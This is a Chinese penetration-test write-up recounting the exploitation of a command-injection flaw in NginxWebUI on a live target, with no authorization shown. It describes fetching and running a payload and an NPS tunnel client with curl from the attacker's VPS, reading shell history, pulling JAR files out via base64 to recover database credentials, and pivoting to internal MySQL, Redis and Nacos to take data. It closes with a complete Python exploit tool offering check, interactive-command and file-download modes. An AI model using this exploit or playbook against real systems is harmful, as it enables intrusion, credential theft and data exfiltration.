记一次NginxWebUI 引发的渗透
2024-7-29 16:34:12 Author: mp.weixin.qq.com(查看原文) 阅读量:0 收藏

在某项目中遇到了nginxWebUI

因为我依稀记得有几个rce的洞 所以试了试之前的payload

结果: 发现有rce

但是burp里面的回显排版太烂了 就写了个python 优化一下这个过程 让结果方便观测一点 如下图

意外

但是不知道怎么回事 用bash 弹shell就不成功 我感觉可能是nginxWebUI命令拼接的时候导致的奇奇怪怪的问题

如下图

现在是想先传一个nps上去 这样对后面如果有仅限localhost的服务可以更方便摸 也可以更好的和队友协同这样

看看能不能用curl 远程读到我的文件之后直接 写入/tmp本地

python接力 curl 实现下载

这里刚好有python环境 本来的想法是想用python来弹shell的 但是我vps监听了以后就跳了一行

x.x.x.x inverse host lookup failed: Unknown host 

就没后续了,也没有继续有交互的总之就是没弹成功shell

于是就准备用python来实现下载文件(比如c2/nps/fscan), 然后执行任务

但是直接执行

curl x.x.x.x/xxx > /tmp/x

在服务器上放一个1.py 然后启动python3 -m http.server

方便我们的目标下载

意外

但是直接curl不能执行

如图

tips

于是用如下方法分多次写入

这样就会执行

curl x.x.x.x/1.py >/tmp/x.py

完成NPS下载 && 运行

我们接着在靶机上执行 python3 /tmp/x.py

vps上弹出这个就说明下载任务开始了。

下载完成以后 /tmp目录会出现client.tar.gz这个文件,这个文件是我的nps 客户端 准备到时候打一些localhost的服务用的,虽然这个是云主机,但是redis,mongodb什么的不一定会少,还有nacos什么的 都是仅localhost的外网不可访问。

然后这样就可以用nps代理上去了

摸敏感文件 / 信息收集

敏感文件

cat .bash_history看了一下 都是几个jar包的启动命令 本地没有别的application.properities这种conf配置

还有redis的启动命令

我就准备把jar下载下来反编译一下 希望能看见jdbc这些的配置

其他

netstat -tunlp 看了一下 redis占用7777 还有一个8848 应该是nacos

下载敏感文件

现在主要的就是download下jar包文件 反编译找连接配置

只要用脚本执行base64 文件绝对路径 然后把输出重定向自己电脑上的其他文件就可以实现下载了。

听着有点繁琐 我已经写好脚本放在后面了

tips:反编译decompile报了版本不对

修改版本就行了

49 =Java5
50=Java6
51=Java7
52=Java8
53=Java9
54=Java10
55=Java11
56=Java12
57=Java13
58=Java14
59=Java15
60=Java16
61=Java 17

JAR反编译后寻找配置文件

修改到匹配版本后

看见久违的jdbc://mysql

但是看着这个Inner感觉有点不对 感觉是内网 ,ping一下

果真内网

nps现在终于用上了

最后拿下大量数据 , 本地nacos , 本地redis , 远程数据库若干

附上成功连接图一张

import requests
import re
import sys
import base64
def helper():
print("----------helper--------------")
print(f"python3 {sys.argv[0]} poc http://example.com/AdminPage/conf/check ")
print(f"python3 {sys.argv[0]} exp http://example.com <command>")
print(f"python3 {sys.argv[0]} download http://example.com <file_absoult_path>")
def exp(url,command):
    req=requests.post(url,headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
"Accept-Encoding":"gzip, deflate",
"Host": getHost(url),
"Content-Type":"application/x-www-form-urlencoded;charset=UTF-8",
"Connection":"close"
},
    data={
"json":'''{"nginxContent":"TES","subContent":["A"],"subName":["A"]}''',
"nginxPath":"/tmp",
"nginxExe":f'''bash -c "echo <result> $({command}) </result>" |'''
}
#,proxies={"http":"http://127.0.0.1:8080"}
)
#   print(req.text)
    try:
print("[+]success\n"+re.compile("echo <result> (.*?)</result>").findall(req.text)[1].replace("<br>","\r\n"))
    except:
print("[-] failed")
def getHost(url):
return(url+"/").split("/")[2]
def download(url, document):
print(url,document)
    filename=document.replace('\\','/').split('/')[-1]
command=f"base64 {document}"
    req=requests.post(url,headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
"Accept-Encoding":"gzip, deflate",
"Host": getHost(url),
"Content-Type":"application/x-www-form-urlencoded;charset=UTF-8",
"Connection":"close"
},
    data={
"json":'''{"nginxContent":"TES","subContent":["A"],"subName":["A"]}''',
"nginxPath":"/tmp",
"nginxExe":f'''bash -c "echo <result> $({command}) </result>" |'''
}
#,proxies={"http":"http://127.0.0.1:8080"}
)
    try:
        result=re.compile("echo <result> (.*?)</result>").findall(req.text)[1].replace("<br>","\r\n")
print(f"[+]Dwonload {document} Success [Len:{len(result)}]")
        with open(filename,"wb")as f:
            f.write(base64.b64decode(result))
    except:
print("[-] Download Failed")
def poc(url):
    req=requests.post(url,headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
"Accept-Encoding":"gzip, deflate",
"Host": getHost(url),
"Content-Type":"application/x-www-form-urlencoded;charset=UTF-8",
"Connection":"close"
},
    data={
"json":'''{"nginxContent":"TES","subContent":["A"],"subName":["A"]}''',
"nginxPath":"/tmp",
"nginxExe":f'''bash -c "echo <result> $(echo 'success') </result>" |'''
}
#,proxies={"http":"http://127.0.0.1:8080"}
)
#print(req.text)    
    try:
        result=re.compile("echo <result> (.*?)</result>").findall(req.text)[1].replace("<br>","\r\n")
if"success"in result:
print("[+] Vuln! {}".format(url))
else:
print("[-] Not Vuln")
    except:
print("[-] Not Vuln")

if __name__=="__main__":
if len(sys.argv)>2:
if len(sys.argv)==3 and sys.argv[1]=="poc":
            poc(sys.argv[2])
if len(sys.argv)==3 and sys.argv[1]=="exp":
whileTrue:
command=input(">>> ")
                exp(sys.argv[2],command)
if len(sys.argv)==4 and sys.argv[1]=="download":
            download(sys.argv[2],sys.argv[3])
else:
        helper()

原文链接

https://www.t00ls.com/articles-71823.html


文章来源: https://mp.weixin.qq.com/s?__biz=Mzg3NzYzODU5NQ==&mid=2247484694&idx=1&sn=203c36c98486733f00de4277b34f3342&chksm=cf1ea3baf8692aac6905e53a7518a4ce9b8558f9a0408206a87cdad20033494180736acafca0&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh